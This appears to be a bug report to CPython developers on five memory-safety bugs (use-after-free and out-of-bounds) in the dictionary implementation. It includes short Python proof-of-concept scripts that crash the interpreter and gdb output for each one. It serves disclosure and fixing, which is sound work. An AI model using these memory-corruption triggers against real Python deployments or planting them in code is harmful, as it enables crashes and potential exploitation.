Here I'll describe five distinct issues I found. Common to them all is that they
reside in the built-in dictionary object.
Four of them are use-after-frees and one is an array-out-of-bounds indexing bug.
All of the described functions reside in /Objects/dictobject.c.
Issue 1: use-after-free when initializing a dictionary
Initialization of a dictionary happens via the function dict_init which calls
dict_update_common. From there, PyDict_MergeFromSeq2 may be called, and that is
where this issue resides.
In PyDict_MergeFromSeq2 we retrieve a sequence of size 2 with this line:
fast = PySequence_Fast(item, "");
After checking its size, we take out a key and value:
key = PySequence_Fast_GET_ITEM(fast, 0);
value = PySequence_Fast_GET_ITEM(fast, 1);
Then we call PyDict_GetItem. This calls back to Python code if the key has a
__hash__ function. From there the "item" sequence could get modified, resulting
in "key" or "value" getting used after having been freed.
Here's a PoC:
---
class X:
def __hash__(self):
pair[:] = []
return 13
pair = [X(), 123]
dict([pair])
---
It crashes while trying to use freed memory as a PyObject:
(gdb) run ./poc24.py
Program received signal SIGSEGV, Segmentation fault.
0x000000000048fe25 in insertdict (mp=mp@entry=0x7ffff6d5c4b8, key=key@entry=0x7ffff6d52538, hash=0xd,
value=value@entry=0x8d1ac0 <small_ints+6144>) at Objects/dictobject.c:831
831 MAINTAIN_TRACKING(mp, key, value);
(gdb) print *key
$26 = {_ob_next = 0xdbdbdbdbdbdbdbdb, _ob_prev = 0xdbdbdbdbdbdbdbdb, ob_refcnt = 0xdbdbdbdbdbdbdbdb,
ob_type = 0xdbdbdbdbdbdbdbdb}
Issue 2: use-after-free in dictitems_contains
In the function dictitems_contains we call PyDict_GetItem to look up a value in
the dictionary:
found = PyDict_GetItem((PyObject *)dv->dv_dict, key);
However this "found" variable is borrowed. We then go ahead and compare it:
return PyObject_RichCompareBool(value, found, Py_EQ);
But PyObject_RichCompareBool could call back into Python code and e.g. release
the GIL. As a result, the dictionary may be mutated. Thus "found" could get
freed.
Then, inside PyObject_RichCompareBool (actually in do_richcompare), the "found"
variable gets used after being freed.
PoC:
---
class X:
def __eq__(self, other):
d.clear()
return NotImplemented
d = {0: set()}
(0, X()) in d.items()
---
Result:
(gdb) run ./poc25.py
Program received signal SIGSEGV, Segmentation fault.
0x00000000004a03b6 in do_richcompare (v=v@entry=0x7ffff6d52468, w=w@entry=0x7ffff6ddf7c8, op=op@entry=0x2)
at Objects/object.c:673
673 if (!checked_reverse_op && (f = w->ob_type->tp_richcompare) != NULL) {
(gdb) print w->ob_type
$26 = (struct _typeobject *) 0xdbdbdbdbdbdbdbdb
Issue 3: use-after-free in dict_equal
In the function dict_equal, we call the "lookdict" function via
b->ma_keys->dk_lookup to look up a value:
if ((b->ma_keys->dk_lookup)(b, key, ep->me_hash, &vaddr) == NULL)
This value's address is stored into the "vaddr" variable and the value is
fetched into the "bval" variable:
bval = *vaddr;
Then we call Py_DECREF(key) which can call back into Python code. This could
release the GIL and mutate dictionary b. Therefore "bval" could become freed at
this point. We then proceed to use "bval":
cmp = PyObject_RichCompareBool(aval, bval, Py_EQ);
This results in a use-after-free.
PoC:
---
class X():
def __del__(self):
dict_b.clear()
def __eq__(self, other):
dict_a.clear()
return True
def __hash__(self):
return 13
dict_a = {X(): 0}
dict_b = {X(): X()}
dict_a == dict_b
---
Result:
(gdb) run ./poc26.py
Program received signal SIGSEGV, Segmentation fault.
PyType_IsSubtype (a=0xdbdbdbdbdbdbdbdb, b=0x87ec60 <PyLong_Type>)
at Objects/typeobject.c:1343
1343 mro = a->tp_mro;
(gdb) print a
$59 = (PyTypeObject *) 0xdbdbdbdbdbdbdbdb
Issue 4: use-after-free in _PyDict_FromKeys
The function _PyDict_FromKeys takes an iterable as argument. If the iterable is
a dict, _PyDict_FromKeys loops over it like this:
while (_PyDict_Next(iterable, &pos, &key, &oldvalue, &hash)) {
if (insertdict(mp, key, hash, value)) {
...
}
}
However if we look at the comment for PyDict_Next, we see this:
* CAUTION: In general, it isn't safe to use PyDict_Next in a loop that
* mutates the dict.
But insertdict can call on to Python code which might mutate the dict. In that
case we perform a use-after-free of the "key" variable.
Here's a PoC:
---
class X(int):
def __hash__(self):
return 13
def __eq__(self, other):
if len(d) > 1:
d.clear()
return False
d = {}
d = {X(1): 1, X(2): 2}
x = {}.fromkeys(d)
---
And the result:
(gdb) run ./poc27.py
Program received signal SIGSEGV, Segmentation fault.
0x0000000000435122 in visit_decref (op=0x7ffff6d5ca68, data=0x0) at Modules/gcmodule.c:373
373 if (PyObject_IS_GC(op)) {
(gdb) print *op
$115 = {_ob_next = 0xdbdbdbdbdbdbdbdb, _ob_prev = 0xdbdbdbdbdbdbdbdb, ob_refcnt = 0xdbdbdbdbdbdbdbdb,
ob_type = 0xdbdbdbdbdbdbdbdb}
An almost identical issue also exists further down in the function when calling
_PySet_NextEntry. To see this crash, just change "d" to be a set in the PoC
above:
d = set()
d = set([X(1), X(2)])
this likewise crashes with a use-after-free.
(Note: if you grep for PyDict_Next you will find more similar cases, although
many are in obscure modules or deprecated functions. I'm not sure those are
worth fixing? E.g. here's a crasher for BaseException_setstate which also calls
PyDict_Next:
---
class X(str):
def __hash__(self):
d.clear()
return 13
d = {}
d[X()] = X()
e = Exception()
e.__setstate__(d)
---
end note.)
Issue 5: out-of-bounds indexing in dictiter_iternextitem
The function dictiter_iternextitem is used to iterate over a dictionary's items.
dictiter_iternextitem is careful to check that the dictionary did not change
size during iteration. However after performing this check, it calls Py_DECREF:
Py_DECREF(PyTuple_GET_ITEM(result, 0));
Py_DECREF(PyTuple_GET_ITEM(result, 1));
This can execute Python code and mutate the dict. If that happens, the index "i"
previously computed by dictiter_iternextitem could become invalid. It would then
index out of bounds with this line:
key = d->ma_keys->dk_entries[i].me_key;
Furthermore the "value_ptr" variable would have gone stale, too. Taking the
"value" variable out of it uses memory that has been freed:
value = *value_ptr;
Here's a PoC which crashes with the "value" variable being an arbitrary pointer:
---
class X(int):
def __del__(self):
d.clear()
d = {i: X(i) for i in range(8)}
for result in d.items():
if result[0] == 2:
d[2] = None # free d[2] --> X(2).__del__ is called
---
The result:
(gdb) run ./poc29.py
Program received signal SIGSEGV, Segmentation fault.
dictiter_iternextitem (di=0x7ffff6d49cd8) at Objects/dictobject.c:3187
3187 Py_INCREF(key);
(gdb) print value
$12 = (PyObject *) 0x7b7b7b7b7b7b7b7b |